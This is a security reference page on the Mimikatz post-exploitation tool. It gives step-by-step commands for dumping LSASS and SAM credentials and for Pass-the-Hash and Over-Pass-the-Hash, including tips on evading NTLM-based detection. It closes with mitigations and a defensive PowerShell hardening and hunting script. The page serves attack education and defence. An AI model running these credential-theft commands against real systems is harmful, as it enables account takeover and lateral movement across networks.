Mimikatz#
Mimikatz is a post-exploitation tool used to view and steal credentials, forge and request Kerberos tickets, and carry out follow-on attacks with what it finds.
It reads credential material out of LSASS process memory and local databases, including plaintext passwords (where a provider still caches them), NTLM hashes, Kerberos keys and tickets.
It is signatured by essentially every antivirus and EDR product, but remains devastating where protection is disabled, bypassed, or the binary is recompiled or obfuscated, and a rebuilt or in-memory variant needs the same handle to lsass.exe, which is where runtime detection should focus.
Enables multiple attack vectors: Credential Dumping, Pass-the-Hash, Over-Pass-the-Hash, Silver Ticket, and Golden Ticket attacks. This page covers the first three.
Source: https://github.com/gentilkiwi/mimikatz
Credential Dumping#
Walkthrough#
Transfer Mimikatz to the Victim Machine
Using any file transfer method (e.g., SMB, HTTP, or direct copy), place mimikatz.exe on the target system.
Execute Mimikatz with Elevated Privileges
Open an elevated command prompt or PowerShell session (local administrator is required; a standard user cannot open lsass.exe) and run Mimikatz:
mimikatz.exe
Enable Debug Privileges
Within the Mimikatz prompt, first enable SeDebugPrivilege so the process can open a handle to lsass.exe, which is otherwise protected from other processes:
mimikatz # privilege::debug
Dump Credentials from Memory
Extract the credentials of every logon session LSASS still holds (interactive users, services, RDP sessions, scheduled tasks):
mimikatz # sekurlsa::logonPasswords
The output is grouped by logon session, and for each session by security provider (msv, wdigest, kerberos, tspkg, credman). It includes:
NTLM (and SHA1) hashes from the msv provider, which are what Pass-the-Hash needs
Plaintext passwords from the wdigest provider, but only where WDigest caching is still enabled (the default before Windows 8.1/Server 2012 R2, or where UseLogonCredential has been set to 1)
Kerberos credentials (the user's password or keys held by the kerberos provider); the cached TGT and service tickets themselves are listed and exported with sekurlsa::tickets /export
Plaintext passwords saved in Credential Manager (the credman provider), such as stored RDP or mapped-drive credentials
Extract Additional Credential Stores
Dump the local account hashes from the SAM database. This reads the SAM and SYSTEM hives through the registry and needs SYSTEM rather than just SeDebugPrivilege, so impersonate SYSTEM first:
mimikatz # token::elevate
mimikatz # lsadump::sam
The local Administrator's NTLM hash from here is reusable on every host that shares the same local password, which is the classic lateral-movement path Pass-the-Hash exploits. lsadump::secrets dumps the LSA secrets (service account passwords, cached domain credentials) from the same position.
Pass-the-Hash (PtH)#
Once you have an NTLM hash, Mimikatz can start a new process whose logon session carries that hash in place of a password, so every network authentication from that process is performed as the victim user:
mimikatz # sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<hash>
Without /run: this spawns cmd.exe; add /run:powershell.exe (or any other command line) to choose the program. The new process still runs under your local token (whoami does not change), but SMB, WMI, WinRM and other remote access from it authenticate as <username>, which is how the hash moves you across the domain.
Over-Pass-the-Hash#
The same command also drives Kerberos: when the spawned process first touches a Kerberos-protected resource, LSA uses the injected NTLM hash as the user's RC4 key to request a TGT, so you get full Kerberos authentication without ever knowing the password:
mimikatz # sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<hash> /run:powershell.exe
Within the new PowerShell session, access a domain resource to trigger the AS-REQ, then inspect the cache:
dir \\<dc>.<domain>\C$
klist
klist now lists a TGT for <domain>\<username>. Because the hash was used as an RC4 key, the ticket's session key type is RC4-HMAC, which stands out in a domain that otherwise uses AES; if you have the user's AES key from sekurlsa::ekeys, pass /aes256:<key> (or /aes128:) instead of /ntlm: and the exchange looks like an ordinary AES logon. The advantage over plain Pass-the-Hash is that the traffic is Kerberos rather than NTLM, so NTLM-only controls and detections do not see it.
Mitigations#
Endpoint Detection and Response (EDR): Deploy EDR that detects Mimikatz at runtime by behaviour (a non-system process opening lsass.exe with read access, SeDebugPrivilege being enabled, sekurlsa-style memory reads) rather than by file signature alone, since the binary is trivially rebuilt.
Disable Unnecessary Services: Stop LSASS from caching plaintext passwords by setting HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential to 0 (the default on Windows 8.1/Server 2012 R2 and later, and available on older systems via KB2871997); plaintext then disappears from sekurlsa::logonPasswords after the next logon.
Credential Guard: Enable Windows Defender Credential Guard on Windows 10/11 and Server 2016+ so that NTLM hashes and Kerberos keys live in an isolated LSA process that Mimikatz cannot read. Alongside it, enable LSA Protection (HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL = 1) so that lsass.exe runs as a protected process and unsigned code cannot open it even with SeDebugPrivilege; bypassing that requires loading a driver, which is far noisier.
Restrict Administrator Access: Limit the number of accounts with administrative privileges and implement Just-In-Time (JIT) admin access, because every step above needs local admin on the host where the credentials are cached.
Monitor Memory Access: Use Sysmon Event ID 10 (ProcessAccess) with TargetImage lsass.exe to log which processes open LSASS and with what access mask; a PROCESS_VM_READ (0x0010) request from anything other than your AV/EDR is the core Mimikatz signal.
Patch Regularly: Mimikatz abuses how Windows stores credentials rather than a single vulnerability, but updates such as KB2871997 (WDigest control and Protected Users backport) and current OS versions shrink what it can find.
Multi-Factor Authentication (MFA): Enforce MFA to make initial access and interactive logons harder; it does not stop Pass-the-Hash or Over-Pass-the-Hash once a hash is in LSASS, because the hash is replayed without a password prompt, so it must be paired with the LSASS protections above.
Audit Kerberos Ticket Requests: On domain controllers, monitor Event IDs 4768 (TGT requested) and 4769 (service ticket requested) for RC4-HMAC (TicketEncryptionType 0x17) in an AES domain, service tickets with no preceding TGT request for the same user (forged tickets), and TGT requests from workstations for accounts that never log on there.
Protected Accounts: Place Domain Admins and other privileged user accounts in the "Protected Users" security group, which disables NTLM, RC4 and DES Kerberos, delegation and local credential caching for them, so a stolen NTLM hash is useless for both attacks above. It is for user accounts only: do not add service accounts, computer accounts or krbtgt, and test first because applications that depend on NTLM will break.
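The registry hardening and the two monitoring items above, as a script you can run to apply and verify them and to hunt for the traces Mimikatz leaves. This is an added example, not code from the Mimikatz project or from Microsoft; it assumes an elevated PowerShell session on Windows 10/Server 2016 or later, Sysmon installed with ProcessAccess (Event ID 10) logging enabled on the endpoint, and that the Kerberos query is run on a domain controller. The function names and the allow-list of legitimate LSASS readers are ours and need tuning to your environment.

```powershell
# Added example (not from the Mimikatz project). Run Set-/Test- on the
# endpoint as administrator; Find-LsassAccess needs Sysmon Event ID 10;
# Find-Rc4KerberosTickets reads the Security log of a domain controller.

function Set-LsassHardening {
    # WDigest: 0 stops LSASS caching plaintext passwords (sekurlsa::wdigest
    # shows "(null)" afterwards). Existing sessions keep theirs until logoff.
    $wdigest = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
    New-ItemProperty -Path $wdigest -Name UseLogonCredential -PropertyType DWord -Value 0 -Force | Out-Null
    # RunAsPPL: lsass.exe runs as a Protected Process Light, so an unsigned
    # mimikatz.exe cannot open it even with SeDebugPrivilege. Needs a reboot.
    $lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    New-ItemProperty -Path $lsa -Name RunAsPPL -PropertyType DWord -Value 1 -Force | Out-Null
}

function Test-LsassHardening {
    $wdigest = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -ErrorAction SilentlyContinue
    $lsa     = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -ErrorAction SilentlyContinue
    # Credential Guard reports itself as service 1 in SecurityServicesRunning.
    $dg = Get-CimInstance -Namespace root\Microsoft\Windows\DeviceGuard -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
    [pscustomobject]@{
        # An absent value means the OS default: disabled on 8.1/2012 R2+,
        # enabled on older systems, so check explicitly rather than assume.
        WDigestUseLogonCredential = $wdigest.UseLogonCredential
        LsaProtectionEnabled      = ($lsa.RunAsPPL -eq 1)
        CredentialGuardRunning    = [bool]($dg.SecurityServicesRunning -contains 1)
    }
}

function Find-LsassAccess {
    param([int]$Hours = 24)
    # Sysmon ID 10: a process opened a handle to another. sekurlsa needs
    # PROCESS_VM_READ (0x0010) on lsass.exe; 0x1010 and 0x1410 are the masks
    # most often seen from Mimikatz. Known-good readers are excluded by path;
    # this allow-list is an assumption to be tuned per estate.
    $allow  = @('C:\Program Files\Windows Defender\MsMpEng.exe')
    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 10; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $d = @{}
        ([xml]$_.ToXml()).Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
        $granted = [Convert]::ToInt32($d.GrantedAccess, 16)
        if ($d.TargetImage -like '*\lsass.exe' -and ($granted -band 0x10) -and $allow -notcontains $d.SourceImage) {
            [pscustomobject]@{ Time = $_.TimeCreated; Source = $d.SourceImage; Access = $d.GrantedAccess; CallTrace = $d.CallTrace }
        }
    }
}

function Find-Rc4KerberosTickets {
    param([int]$Hours = 24)
    # Domain controller Security log. 4768 = TGT issued, 4769 = service
    # ticket issued. TicketEncryptionType 0x17 (RC4-HMAC) in an AES-only
    # domain is what sekurlsa::pth /ntlm: looks like from the DC's side.
    $filter = @{ LogName = 'Security'; Id = 4768, 4769; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $d = @{}
        ([xml]$_.ToXml()).Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
        if ($d.TicketEncryptionType -eq '0x17') {
            [pscustomobject]@{ Time = $_.TimeCreated; Id = $_.Id; User = $d.TargetUserName; Service = $d.ServiceName; Client = $d.IpAddress }
        }
    }
}

# Typical use on an endpoint, then on a DC:
Set-LsassHardening
Test-LsassHardening
Find-LsassAccess -Hours 24 | Format-Table -AutoSize
Find-Rc4KerberosTickets -Hours 24 | Format-Table -AutoSize
```

Run `Find-LsassAccess` on a clean host first to build the allow-list: backup agents, EDR sensors and some monitoring tools legitimately read LSASS, and every one you leave in the results is noise that will hide the real hit. `Find-Rc4KerberosTickets` only means something once the domain's accounts have AES keys (set after a password change on a 2008+ domain functional level); in a domain still issuing RC4 everywhere, filter on the user and client address instead.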